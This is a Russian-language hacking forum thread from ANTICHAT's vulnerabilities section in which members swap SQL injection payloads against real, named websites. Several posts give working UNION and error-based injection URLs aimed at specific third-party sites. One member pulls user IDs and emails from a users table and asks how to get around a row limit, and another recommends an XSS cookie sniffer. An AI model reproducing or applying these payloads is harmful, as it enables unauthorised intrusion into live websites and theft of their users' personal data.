HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.09.2013, 00:22
Always
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами: 7504886

Репутация: 0
По умолчанию

Что может означать такая ошибка?

выпадает в поле логин - %5C

Warning: PDOStatement::execute(): SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5ebe553e01799a927b1d045924bbd4fd' AND status='ok'' at line 1 in /var/www/site/data/www/site.ru/application/class/Member.php on line 390
 
Ответить с цитированием

  #2  
Старый 30.09.2013, 00:29
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
С нами: 9228480

Репутация: 0
По умолчанию

'%2bconvert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFO RMATION_SCHEMA.TABLES))%2b'

выдает ошибку

Subqueries are not allowed in this context. Only scalar expressions are allowed.

и как его обойти?
 
Ответить с цитированием

  #3  
Старый 30.09.2013, 10:05
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sanic1977  
'%2bconvert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFO RMATION_SCHEMA.TABLES))%2b'
выдает ошибку
Subqueries are not allowed in this context. Only scalar expressions are allowed.
и как его обойти?
Нельзя использовать в качестве параметра запрос.

Может сделать прощще:

1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA .TABLES)
 
Ответить с цитированием

  #4  
Старый 30.09.2013, 14:25
Massay
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами: 6940406

Репутация: 0
По умолчанию

Добрый день, скажите пожалуйста каким сниффером вы пользуетесь для XSS
 
Ответить с цитированием

  #5  
Старый 01.10.2013, 19:47
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

В общем возникли некие трудности в получении данных, фильтра вроде бы нет, но не могу получить.

Код:
www.ukok-tour.ru/index.php?t=1+union+select+1,2,3+--+
http://www.isotropix.com/index.php?to=products&productid=99%27+union+select+1,2,3,4,5,6,7,8+--+&view=trynow
http://www.hmn.ru/index.php?index=14&value=12+order+by+1+--+
 
Ответить с цитированием

  #6  
Старый 01.10.2013, 23:11
Always
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами: 7504886

Репутация: 0
По умолчанию

Цитата:
Сообщение от Unknowhacker  
В общем возникли некие трудности в получении данных, фильтра вроде бы нет, но не могу получить.
Код:
www.ukok-tour.ru/index.php?t=1+union+select+1,2,3+--+
http://www.isotropix.com/index.php?to=products&productid=99%27+union+select+1,2,3,4,5,6,7,8+--+&view=trynow
http://www.hmn.ru/index.php?index=14&value=12+order+by+1+--+
http://www.ukok-tour.ru/index.php?t=1'and(select+1+from(select+count(*),co ncat((select+table_name+from+information_schema.ta bles+limit+1,1),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)='and+--+
 
Ответить с цитированием

  #7  
Старый 02.10.2013, 01:10
Ravenous
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
С нами: 7278806

Репутация: 26
По умолчанию

Цитата:
Сообщение от Unknowhacker  
В общем возникли некие трудности в получении данных, фильтра вроде бы нет, но не могу получить.
Код:
www.ukok-tour.ru/index.php?t=1+union+select+1,2,3+--+
http://www.isotropix.com/index.php?to=products&productid=99%27+union+select+1,2,3,4,5,6,7,8+--+&view=trynow
http://www.hmn.ru/index.php?index=14&value=12+order+by+1+--+
Код:
http://www.isotropix.com/index.php?to=products&productid=991 AND extractvalue(1,concat(0x3a,(select version() limit 0,1)))
в третьем случае нет инъекции
 
Ответить с цитированием

  #8  
Старый 02.10.2013, 11:02
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами: 6747446

Репутация: 32
По умолчанию

Цитата:
Сообщение от Massay  
Добрый день, скажите пожалуйста каким сниффером вы пользуетесь для XSS
http://hpc.name/sniffer/
 
Ответить с цитированием

  #9  
Старый 02.10.2013, 17:18
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами: 6747446

Репутация: 32
По умолчанию

Нашёл на этом сайте _http://agixo.ru/ уязвимость в куках прохожу по ссылке http://agixo.ru/1-reg.html реферер админ смотрим куки referer 1

запускаем оперу меняем 1 на к перехожу по ссылке уже такой http://agixo.ru/reg.html

смотрим Ник, ID, Предустановленый реф-бек: % все исчезла.

Что можно сделать с этой уязвимостью можно ли провести sql инвекцию я с уязвимостями в куках ещё не сталкивался
 
Ответить с цитированием

  #10  
Старый 02.10.2013, 17:46
Evil_Genius
Новичок
Регистрация: 03.08.2009
Сообщений: 23
С нами: 8827377

Репутация: -5
По умолчанию

Вобщем делаю sql запрос:

site.ru/?file=2+and(select+1+from(select+count(*),concat(( select+(select+(select+concat(0x7e,0x27,s_Users.Id ,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+limi t+0,1)+)+from+`information_schema`.tables+limit+0, 1),floor(rand(0)*2))x+from+`information_schema`.ta bles+group+by+x)a)+and+1=1

На что мне благополучно выдает Duplicate entry '~'1'~1' for key 'group_key'. т.е выдает нужны резульат.

Делаем еще один запрос:

site.ru/?file=2+and(select+1+from(select+count(*),concat(( select+(select+(select+concat(0x7e,0x27,s_Users.Em ail,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+l imit+0,1)+)+from+`information_schema`.tables+limit +0,1),floor(rand(0)*2))x+from+`information_schema` .tables+group+by+x)a)+and+1=1

На что мне выдает: Subquery returns more than 1 row - чертов лимин(((

Подскажите, как выполнить второй запрос - чтобы избежать лимита.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.